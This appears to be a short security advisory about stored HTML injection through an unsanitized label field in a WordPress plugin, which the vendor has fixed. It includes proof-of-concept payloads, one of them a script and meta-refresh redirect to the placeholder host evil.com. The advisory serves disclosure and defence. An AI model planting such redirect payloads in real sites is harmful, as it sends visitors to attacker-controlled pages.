Description The plugin does not sanitize and escape its label fields, which could allow high privilege users such as admin to perform Stored HTML injection. Only users with the unfiltered_html capability can perform this, and such users are already allowed to use JS in posts/comments etc however the vendor acknowledged and fixed the issue
Put the following code in any form field (for example name, email, message etc) labels:
<!DOCTYPE html> <html> <head> <style> @keyframes moving { 0% { transform: translateX(0); } 50% { transform: translateX(100px); } 100% { transform: translateX(0); } } .horizontal-text { display: inline-block; animation: moving 2s infinite linear; } </style> </head> <body> <div class="horizontal-text">Sam</div> </body> </html>
or
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<meta http-equiv="refresh" content="0; URL=https://evil.com">
</head>
<body>
<script>
window.location.href = "https://evil.com";
</script>
</body>
</html>